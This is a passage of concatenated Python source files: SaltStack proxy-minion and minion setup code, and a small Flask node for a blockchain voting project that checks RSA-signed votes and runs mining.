the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error('Unable to merge mine functions from the pillar in the opts, for proxy {}'.format(
self.opts['id']))
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# `proxy_keep_alive` defaults to True; when explicitly set to False the proxy does not retry reconnecting
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
interface.py
|
'''
title : interface.py
description : A blockchain voting miner node implementation, with the following features
- Verification of vote (based on RSA algorithm)
- Vote counting
author : Jerry Xie
date_created : 20190118
date_modified : 20190319
version : 0.1
usage : python3 interface.py
python_version : 3.6.5
Comments :
References : This project is inspired by
https://hackernoon.com/learn-blockchains-by-building-one-117428612f46 and
https://github.com/dvf/blockchain
'''
import sys
sys.path.append("./Modal")
sys.path.append("./View")
sys.path.append("./Controller")
sys.path.append("Node/Modal")
sys.path.append("Node/View")
sys.path.append("Node/Controller")
from time import ctime
from blockChain import Blockchain
from vote import Vote
from core_logic import gen_id, verify_object_signature
from helper import restor_from_file
import requests
from flask import Flask, jsonify, request, render_template, abort
# Allow requests from other servers (nodes)
from flask_cors import CORS
# Handling path string
import os
tmpl_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'View/templates')
sta_dir = os.path.join(os.path.dirname(
os.path.abspath(__file__)), 'View/static')
# Instantiate the Blockchain
blockchain = restor_from_file()
if not blockchain:
blockchain = Blockchain()
blockchain.curr_session = []
blockchain.update_chain_from_nodes()
MINERS_PUBLIC_ADDRESS = restor_from_file('pub.der')
MINERS_PRIVATE_ADDRESS = restor_from_file('pri.der')
import threading
MINER_WORKER = None
def get_candidate_public_key_from_some_secure_channel():
# This can be done by downloading from https servers
return '30819f300d06092a864886f70d010101050003818d0030818902818100abfac79b3656f20de2cda012482788f78a0b6e891c6b93c946c3b14617a6aa743b49a9fbbd426245b7ef8382f20c2a6f0d29ab92699961076fe38658f4e6a4bbbdededc053aa445f78a0aaf17559ee8fea17e2f19b812201c7b4a7f8029f2df8fb030561f25d8b7e9c829530633ea1cb68aed505574c34e74b2b6e20b88d20990203010001'
def from_locoal_host(request):
ip = None
if request.headers.getlist("X-Forwarded-For"):
ip = request.headers.getlist("X-Forwarded-For")[0]
else:
ip = request.remote_addr
return ip == '127.0.0.1'
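# Illustrative note (not part of the original file): behind a reverse proxy the
# client address arrives in the X-Forwarded-For header, so its first entry is
# used; otherwise request.remote_addr is the direct peer. Hypothetical example:
#   X-Forwarded-For: 203.0.113.7, 10.0.0.2  ->  ip == '203.0.113.7'  ->  not local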
def return_fresh_thread(arguments):
global blockchain
return threading.Thread(target=blockchain.mine, args=arguments)
# Instantiate the Node
app = Flask(__name__, static_folder=sta_dir, template_folder=tmpl_dir)
CORS(app)
@app.template_filter('ctime')
def timectime(s):
return ctime(s) # datetime.datetime.fromtimestamp(s)
@app.route('/')
def index():
global MINER_WORKER
global blockchain
table_items_outstanding = blockchain.curr_session
# for vote_dict in blockchain.curr_session:
# table_items_outstanding.append(vote_dict)
table_items_mined = blockchain.chain
isMining = MINER_WORKER and MINER_WORKER.is_alive()
return render_template('./index.html', index_is="isMining", table_items_outstanding=table_items_outstanding, table_items_mined=table_items_mined, isMining=isMining)
@app.route('/mine', methods=['GET'])
def start_mining():
global blockchain
global MINER_WORKER
global MINERS_PRIVATE_ADDRESS
global MINERS_PUBLIC_ADDRESS
response = {}
code = 200
if not MINERS_PUBLIC_ADDRESS or not MINERS_PRIVATE_ADDRESS:
response['error'] = "Please set your key-pair first"
code = 400
elif MINER_WORKER and MINER_WORKER.is_alive():
response['error'] = "This node is already mining."
code = 400
else:
MINER_WORKER = return_fresh_thread(
(MINERS_PUBLIC_ADDRESS, MINERS_PRIVATE_ADDRESS))
MINER_WORKER.start()
return jsonify(response), code
@app.route('/configure')
def configure():
global blockchain
registered_nodes = list(blockchain.nodes)
return render_template('./configure.html', index_is="isConfiguring", registered_nodes=registered_nodes)
@app.route('/import_id')
def new_id():
return render_template('./import_id.html', index_is="isImporting")
@app.route('/identity/new', methods=['GET'])
def new_identity():
response = gen_id()
global MINERS_PRIVATE_ADDRESS
global MINERS_PUBLIC_ADDRESS
MINERS_PRIVATE_ADDRESS = response.pop("private_key")
MINERS_PUBLIC_ADDRESS = response.get("public_key")
return jsonify(response), 200
# Functions below are open to the public
@app.route('/chain', methods=['GET'])
def get_chain():
global blockchain
response = blockchain.export_chain()
return jsonify(response), 200
@app.route('/transactions/get', methods=['GET'])
def get_transactions():
# Get transactions from transactions pool
outstanding_rslt = blockchain.curr_session
response = {'transactions': outstanding_rslt}
return jsonify(response), 200
@app.route('/register_nodes', methods=['POST'])
def register_nodes():
global blockchain
values = request.form
required = ['nodes']
response = {}
if not all(k in values for k in required):
response['error'] = "Missing values"
return jsonify(response), 400
if blockchain.connect_node(values['nodes']) > 0:
response['error'] = "Invalid url"
return jsonify(response), 400
response['message'] = "The node is registered."
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
global blockchain
values = request.form
response = {}
# Check that the required fields are in the POST'ed data
required = ['voter_address_con', 'vote2_con', 'signature_con', 'can_sign']
if not all(k in values for k in required):
response['error'] = 'Missing values'
return jsonify(response), 400
if not verify_object_signature(get_candidate_public_key_from_some_secure_channel(), values['can_sign'], values['vote2_con']):
response['error'] = "Invalid Candidate"
return jsonify(response), 400
# Create a new Transaction
rslt = blockchain.submit_transaction(
values['voter_address_con'], values['vote2_con'], values['signature_con'])
if rslt == -1:
response['error'] = 'Invalid Vote!'
return jsonify(response), 400
response = {'message': 'Transaction will be added to Block soon.'}
return jsonify(response), 200
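# Illustrative sketch (not part of the original file): submitting a vote to this
# endpoint with form-encoded fields; all values below are hypothetical.
#
#   import requests
#   requests.post('http://127.0.0.1:5000/transactions/new', data={
#       'voter_address_con': '<voter public key hex>',
#       'vote2_con': '<vote payload>',
#       'signature_con': '<voter signature hex>',
#       'can_sign': '<candidate signature over the vote>',
#   })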
if __name__ == '__main__':
from argparse import ArgumentParser
import atexit
from helper import dump2file
atexit.register(dump2file, blockchain)
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=5000,
type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
try:
app.run(host='0.0.0.0', port=port)
except:
dump2file(blockchain)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
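# Illustrative sketch (not part of the original module) of how prep_ip_port()
# splits the configured master value; the inputs are hypothetical.
#
#   prep_ip_port({'master_uri_format': 'default', 'master': 'salt.example.com'})
#   # -> {'master': 'salt.example.com'}
#   prep_ip_port({'master_uri_format': 'default', 'master': '127.0.0.1:4506'})
#   # -> {'master': '127.0.0.1', 'master_port': '4506'}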
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: anything os.makedirs would accept as a mode.
uid: the uid to set. If not set, or if it is None or -1, no changes are
made. The same applies if the directory is already owned by this
uid. Must be an int. Works only on unix/unix-like systems.
gid: the gid to set. If not set, or if it is None or -1, no changes are
made. The same applies if the directory is already owned by this
gid. Must be an int. Works only on unix/unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
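# Illustrative sketch (hypothetical cachedir and uid): typical use of
# get_proc_dir() when preparing the directory that job files are written to.
#
#     proc_dir = get_proc_dir('/var/cache/salt/minion', uid=0, mode=0o700)
#     # -> '/var/cache/salt/minion/proc', created if missing, chmod'ed to 0700
#     #    and chown'ed to uid 0 where the platform supports it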
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
                # Don't append the version that was just derived from parse_input
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
                    # Function supports **kwargs, or the parsed keyword matches
                    # one of the function's positional arguments.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
        # if the arg is a dict with __kwarg__ == True, then it's a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs, or the key matches one of the
                    # function's positional arguments.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
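# Illustrative sketch (hypothetical function and job data): how
# load_args_and_kwargs() separates plain positional args from the __kwarg__
# dicts produced on the master side. The '__pub_*' keys are only packed in
# when the target function accepts **kwargs.
#
#     args = ['web1', {'__kwarg__': True, 'timeout': 30}]
#     load_args_and_kwargs(my_func, args, data={'jid': '20170101000000000000'})
#     # -> (['web1'], {'timeout': 30, '__pub_jid': '20170101000000000000'})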
def eval_master_func(opts):
'''
    Evaluate the master function if master_type is 'func'
    and save its result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str) and \
not isinstance(opts['master'], list):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string or a list'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
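# Illustrative sketch (hypothetical module name): a minion config that drives
# eval_master_func(). The referenced module is assumed to live on the minion's
# extension module path and to return either a string or a list of masters.
#
#     master_type: func
#     master: my_master_lookup.get_master
#
# After evaluation, opts['master'] holds whatever my_master_lookup.get_master()
# returned and opts['__master_func_evaluated'] is set so it only runs once.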
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
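# Illustrative sketch: the tags produced by master_event() for the supported
# event types; only the 'alive' tag is suffixed with the master address.
#
#     master_event(type='connected')                       # '__master_connected'
#     master_event(type='alive', master='salt1.example')   # '__master_alive_salt1.example'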
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
